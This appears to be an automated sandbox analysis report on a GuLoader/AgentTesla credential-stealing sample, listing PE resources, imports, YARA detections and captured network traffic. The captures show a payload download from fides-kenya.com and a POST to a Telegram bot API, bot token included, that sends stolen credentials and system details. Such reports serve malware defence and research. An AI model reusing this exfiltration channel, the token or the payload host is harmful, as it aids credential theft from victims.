                                    .rsrc0x630000x14ec00x15000False0.326160249256data5.55589914674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x632980x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                    RT_ICON0x73ac00x25a8dataEnglishUnited States
                                    RT_ICON0x760680x10a8dataEnglishUnited States
                                    RT_ICON0x771100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                    RT_DIALOG0x775780x100dataEnglishUnited States
                                    RT_DIALOG0x776780x11cdataEnglishUnited States
                                    RT_DIALOG0x777980xc4dataEnglishUnited States
                                    RT_DIALOG0x778600x60dataEnglishUnited States
                                    RT_GROUP_ICON0x778c00x3edataEnglishUnited States
                                    RT_VERSION0x779000x27cdataEnglishUnited States
                                    RT_MANIFEST0x77b800x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                    DLLImport
                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                    DescriptionData
                                    LegalCopyrightBademestersnona
                                    FileVersion14.20.6
                                    CompanyNamefenolersfagins
                                    LegalTrademarksIndlststro
                                    CommentsCARAGUATAUNACHI
                                    ProductNameSKNSFORRETNI
                                    FileDescriptionethere
                                    Translation0x0409 0x04b0
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 26, 2022 14:15:21.249969006 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.263926029 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.264182091 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.264797926 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.278597116 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.278681040 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.278754950 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.278846979 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.278862953 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.278932095 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.278940916 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279000044 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279050112 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279093027 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279102087 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279139996 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279166937 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279191971 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279239893 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279243946 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279305935 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.279362917 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.279467106 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293047905 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293159962 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293226957 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293242931 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293313026 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293375015 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293447971 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293453932 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293517113 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293529987 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293616056 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293617964 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293672085 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293693066 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293780088 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293800116 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293865919 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.293895006 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293914080 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.293930054 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294009924 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294012070 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294070959 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294120073 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294121981 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294140100 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294190884 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294235945 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294245005 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294303894 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294312000 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294336081 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294375896 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294408083 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294437885 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294462919 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294508934 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294543982 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.294660091 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.294692993 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308413982 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308495045 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308546066 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308628082 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308645964 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308676004 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308702946 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308753014 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308768988 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308799982 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308862925 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.308928013 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.308963060 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309016943 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309094906 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309117079 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309187889 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309211969 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309293985 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309339046 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309375048 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309395075 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309448957 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309495926 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309510946 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309528112 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309607983 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309621096 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309623003 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309688091 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309737921 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309775114 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309793949 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309823990 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309878111 CEST4975280192.168.11.205.9.197.244
                                    May 26, 2022 14:15:21.309914112 CEST80497525.9.197.244192.168.11.20
                                    May 26, 2022 14:15:21.309952021 CEST4975280192.168.11.205.9.197.244
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 26, 2022 14:15:21.053791046 CEST5696053192.168.11.201.1.1.1
                                    May 26, 2022 14:15:21.240245104 CEST53569601.1.1.1192.168.11.20
                                    May 26, 2022 14:15:29.819385052 CEST5060453192.168.11.201.1.1.1
                                    May 26, 2022 14:15:29.827667952 CEST53506041.1.1.1192.168.11.20
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    May 26, 2022 14:15:21.053791046 CEST192.168.11.201.1.1.10x91e4Standard query (0)www.fides-kenya.comA (IP address)IN (0x0001)
                                    May 26, 2022 14:15:29.819385052 CEST192.168.11.201.1.1.10xcbd6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    May 26, 2022 14:15:21.240245104 CEST1.1.1.1192.168.11.200x91e4No error (0)www.fides-kenya.comfides-kenya.comCNAME (Canonical name)IN (0x0001)
                                    May 26, 2022 14:15:21.240245104 CEST1.1.1.1192.168.11.200x91e4No error (0)fides-kenya.com5.9.197.244A (IP address)IN (0x0001)
                                    May 26, 2022 14:15:29.827667952 CEST1.1.1.1192.168.11.200xcbd6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                    • api.telegram.org
                                    • www.fides-kenya.com
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.11.2049753149.154.167.220443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.11.20497525.9.197.24480C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                    TimestampkBytes transferredDirectionData
                                    May 26, 2022 14:15:21.264797926 CEST5711OUTGET /yem/wam.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: www.fides-kenya.com
                                    Cache-Control: no-cache
                                    May 26, 2022 14:15:21.278681040 CEST5711INHTTP/1.1 200 OK
                                    Connection: Keep-Alive
                                    Keep-Alive: timeout=5, max=100
                                    content-type: application/octet-stream
                                    last-modified: Mon, 23 May 2022 09:15:41 GMT
                                    accept-ranges: bytes
                                    content-length: 214080
                                    date: Thu, 26 May 2022 12:15:21 GMT
                                    server: LiteSpeed


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.11.2049753149.154.167.220443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                    TimestampkBytes transferredDirectionData
                                    2022-05-26 12:15:30 UTC0OUTPOST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=---------------------------8da3f25989d6468
                                    Host: api.telegram.org
                                    Content-Length: 1004
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    2022-05-26 12:15:30 UTC0INHTTP/1.1 100 Continue
                                    2022-05-26 12:15:30 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 66 32 35 39 38 39 64 36 34 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 35 37 30 34 37 36 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 66 32 35 39 38 39 64 36 34 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 38 37 38 34 31 31 0a 4f 53 46 75 6c
                                    Data Ascii: -----------------------------8da3f25989d6468Content-Disposition: form-data; name="chat_id"1570476458-----------------------------8da3f25989d6468Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/878411OSFul
                                    2022-05-26 12:15:31 UTC1INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Thu, 26 May 2022 12:15:31 GMT
                                    Content-Type: application/json
                                    Content-Length: 613
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    {"ok":true,"result":{"message_id":1116,"from":{"id":5147163644,"is_bot":true,"first_name":"Originlogger0065_bot","username":"Originlogger0065_bot"},"chat":{"id":1570476458,"first_name":"Lee","type":"private"},"date":1653567330,"document":{"file_name":"user-878411 2022-05-26 02-34-53.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIEXGKPb2JJIK-pTxfjQuqfMdkN-OUEAALaAgACzGmBRLGaAxm3q6u7JAQ","file_unique_id":"AgAD2gIAAsxpgUQ","file_size":430},"caption":"New PW Recovered!\n\nUser Name: user/878411\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                    Click to jump to process

                                    Target ID:1
                                    Start time:14:14:49
                                    Start date:26/05/2022
                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
                                    Imagebase:0x400000
                                    File size:912777 bytes
                                    MD5 hash:DEB3E51A2D7D566C86B22046C1058F1A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.9740495232.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:4
                                    Start time:14:15:08
                                    Start date:26/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
                                    Imagebase:0xae0000
                                    File size:106496 bytes
                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    Target ID:5
                                    Start time:14:15:09
                                    Start date:26/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7020d0000
                                    File size:875008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    No disassembly